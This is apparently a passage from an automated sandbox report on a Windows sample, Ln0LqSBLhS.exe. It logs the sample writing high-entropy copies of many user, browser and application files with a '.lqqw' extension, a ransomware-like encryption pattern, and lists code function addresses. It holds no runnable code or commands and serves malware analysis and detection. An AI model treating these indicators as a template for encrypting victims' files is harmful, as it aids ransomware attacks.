                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt entropy: 7.9963964283Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt entropy: 7.99821272005Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt entropy: 7.99844904694Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt entropy: 7.99699246137Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt entropy: 7.99872358942Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt entropy: 7.99830824552Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt entropy: 7.99345519689Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt entropy: 7.99868474866Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt entropy: 7.99606763844Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt entropy: 7.99868955116Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt entropy: 7.998718908Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt entropy: 7.99368233614Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt entropy: 7.9968363104Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt entropy: 7.9964580979Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt entropy: 7.99363273514Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt entropy: 7.99204195204Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\eventpage_bin_prod.js entropy: 7.99704415632Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_background.js entropy: 7.99903968529Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\craw_window.js entropy: 7.99882389297Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\angular.js entropy: 7.99877824532Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\cast_sender.js entropy: 7.99638427382Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\common.js entropy: 7.99557827677Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback_script.js entropy: 7.99265725776Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\material_css_min.css entropy: 7.99890026303Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_cast_streaming.js entropy: 7.99481881214Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_common.js entropy: 7.99880660274Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_hangouts.js entropy: 7.99895437499Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\IS7SFJTT\www.bing[1].xml entropy: 7.99877551862Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif entropy: 7.99770953854Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\_metadata\computed_hashes.json entropy: 7.99352463114Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe.lqqw (copy) entropy: 7.99880799193Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temp\chrome_installer.log.lqqw (copy) entropy: 7.99157422112Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temp\SetupExe(202007230953501D8).log.lqqw (copy) entropy: 7.99890888568Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.lqqw (copy) entropy: 7.9945159915Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.lqqw (copy) entropy: 7.99906732422Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jtx.lqqw (copy) entropy: 7.9987921799Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.lqqw (copy) entropy: 7.99885906438Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.lqqw (copy) entropy: 7.99886163126Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.lqqw (copy) entropy: 7.99881469911Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.lqqw (copy) entropy: 7.99733418253Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.lqqw (copy) entropy: 7.99595018325Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temp\CR_8F2A8.tmp\setup.exe.lqqw (copy) entropy: 7.99873096846Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.lqqw (copy) entropy: 7.99622355643Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.lqqw (copy) entropy: 7.99844797857Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.lqqw (copy) entropy: 7.99903161835Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.lqqw (copy) entropy: 7.99883456221Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.lqqw (copy) entropy: 7.99875002603Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.lqqw (copy) entropy: 7.99882036988Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.lqqw (copy) entropy: 7.9989944499Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.lqqw (copy) entropy: 7.99874673184Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.lqqw (copy) entropy: 7.99873315536Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.lqqw (copy) entropy: 7.99875625678Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.lqqw (copy) entropy: 7.9988195873Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.lqqw (copy) entropy: 7.99885371468Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.lqqw (copy) entropy: 7.99880301134Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.lqqw (copy) entropy: 7.99869179775Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.lqqw (copy) entropy: 7.99891226707Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.lqqw (copy) entropy: 7.99899410563Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.lqqw (copy) entropy: 7.99716526689Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics-active.pma.lqqw (copy) entropy: 7.99871731328Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics.pma.lqqw (copy) entropy: 7.99876990347Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\DomainSuggestions\en-US.1.lqqw (copy) entropy: 7.99110856058Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.lqqw (copy) entropy: 7.99870704592Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.lqqw (copy) entropy: 7.99519656282Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\1033\StructuredQuerySchema.bin.lqqw (copy) entropy: 7.99871092252Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{1451C5E2-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.lqqw (copy) entropy: 7.99869114602Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.lqqw (copy) entropy: 7.99847881821Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000018.db.lqqw (copy) entropy: 7.99821760278Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.db.lqqw (copy) entropy: 7.99823081558Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db.lqqw (copy) entropy: 7.99812680849Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db.lqqw (copy) entropy: 7.99845813245Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog.etl.lqqw (copy) entropy: 7.99880856812Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.lqqw (copy) entropy: 7.99859165542Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000A.log.lqqw (copy) entropy: 7.99896848642Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000B.log.lqqw (copy) entropy: 7.99881428864Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000C.log.lqqw (copy) entropy: 7.99877488296Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00001.jrs.lqqw (copy) entropy: 7.99883025917Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01res00002.jrs.lqqw (copy) entropy: 7.99887197064Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.lqqw (copy) entropy: 7.99281350965Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy) entropy: 7.99905027511Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy) entropy: 7.99805406465Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.lqqw (copy) entropy: 7.99517418893Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.lqqw (copy) entropy: 7.99716790756Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.lqqw (copy) entropy: 7.99364776516Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.lqqw (copy) entropy: 7.99887912007Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.lqqw (copy) entropy: 7.99670844587Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.lqqw (copy) entropy: 7.99560052451Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.lqqw (copy) entropy: 7.99704784972Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\0W10PBUV\OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2[1].js.lqqw (copy) entropy: 7.99879280071Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJnA2[1].js.lqqw (copy) entropy: 7.99399529003Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\PreSignInSettingsConfig[1].json.lqqw (copy) entropy: 7.99440144414Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\MEEXW4H4\suggestions[1].en-US.lqqw (copy) entropy: 7.99089007368Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\PSUEOSZZ\l1[1].dat.lqqw (copy) entropy: 7.99523940636Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2[1].css.lqqw (copy) entropy: 7.99817044302Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Temporary Internet Files\Content.IE5\WJ8I2OL4\iecompatviewlist[1].xml.lqqw (copy) entropy: 7.99889138738Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.lqqw (copy) entropy: 7.99886951625Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Application Data\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.lqqw (copy) entropy: 7.99764138277Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma.lqqw (copy) entropy: 7.99878462798Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma.lqqw (copy) entropy: 7.9987726497Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.ico.lqqw (copy) entropy: 7.99869554083Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store.lqqw (copy) entropy: 7.99878622802Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlBilling.store.lqqw (copy) entropy: 7.99028322924Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store.lqqw (copy) entropy: 7.99464336971Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store.lqqw (copy) entropy: 7.99872446635Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store.lqqw (copy) entropy: 7.99883503892Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlMalware.store.lqqw (copy) entropy: 7.99822090908Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store.lqqw (copy) entropy: 7.99888043723Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store.lqqw (copy) entropy: 7.99852505772Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4DBE02_2_03C4DBE0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4C7602_2_03C4C760
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C50B002_2_03C50B00
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4E6E02_2_03C4E6E0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4CA102_2_03C4CA10
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C6E9A32_2_03C6E9A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C6F9B02_2_03C6F9B0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C500D02_2_03C500D0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C618D02_2_03C618D0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C430EE2_2_03C430EE
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4B0B02_2_03C4B0B0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C4B0002_2_03C4B000
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040D2403_2_0040D240
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00419F903_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040C0703_2_0040C070
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042E0033_2_0042E003
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042F0103_2_0042F010
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_004101603_2_00410160
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0044237E3_2_0044237E
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_004344FF3_2_004344FF
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0043E5A33_2_0043E5A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0044B5B13_2_0044B5B1
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040A6603_2_0040A660
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0041E6903_2_0041E690
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040274E3_2_0040274E
